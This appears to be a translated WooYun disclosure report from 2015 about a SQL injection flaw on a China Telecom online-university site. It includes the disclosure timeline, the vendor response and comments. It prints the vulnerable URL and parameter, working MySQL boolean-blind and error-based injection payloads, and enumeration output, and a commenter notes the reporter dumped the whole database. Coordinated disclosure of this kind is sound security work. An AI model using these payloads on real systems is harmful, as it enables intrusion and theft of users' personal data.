
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0106945

Title: SQL injection vulnerability on a China Telecom site (large amount of sensitive user information involved)

Vendor: China Telecom

Author: 几何黑店

Submitted: 2015-04-09 21:13

Fix time: 2015-05-29 08:46

Published: 2015-05-29 08:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-09: Details sent to the vendor; awaiting vendor handling
2015-04-14: Vendor confirmed; details visible to the vendor only
2015-04-24: Details disclosed to core white hats and experts in related fields
2015-05-04: Details disclosed to regular white hats
2015-05-14: Details disclosed to intern white hats
2015-05-29: Details disclosed to the public

Brief description:

SQL injection vulnerability on a China Telecom site (890,000 user records involved)

Detailed description:

www.myctu.cn
China Telecom Online University

[Screenshot: QQ图片20150409210327.png]


http://circle.myctu.cn/api.php?app=userauth:api&mod=plugin&param=uid%3D0&random=0.5043484827037901&_=1428579086625


---
Parameter: param (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=userauth:api&mod=plugin&param=uid=0 RLIKE (SELECT (CASE WHEN (2544=2544) THEN 0x75696425334430 ELSE 0x28 END))&random=0.5043484827037901&_=1428579086625
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: app=userauth:api&mod=plugin&param=uid=0 AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7162707071,(SELECT (ELT(6137=6137,1))),0x7170627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&random=0.5043484827037901&_=1428579086625
---
web application technology: Nginx, PHP 5.3.20
back-end DBMS: MySQL 5.0
available databases [2]:
[*] forum
[*] information_schema


Database: forum
[311 tables]

Proof of vulnerability:

[Screenshot: QQ图片20150409205101.png]

Remediation:

You know what to do.

Copyright notice: when reposting, please credit the source 几何黑店@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-04-14 08:45

Vendor reply:

CNVD has confirmed the risk of the described vulnerability; it has been forwarded via CNCERT to China Telecom Group, which will coordinate handling with the unit that operates the site.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-04-10 00:13 | 明月影 ( Passerby | Rank:12 Vulnerabilities:8 | Learning techniques, learning approaches. )

    Impressive!

  2. 2015-05-29 09:32 | Neeke ( Regular white hat | Rank:101 Vulnerabilities:24 | Anyone want to teach me how to farm Rank? )

    Judging from the screenshot, hacker, you're using --dump to pull the whole database! Why on earth not use --count to get the record count???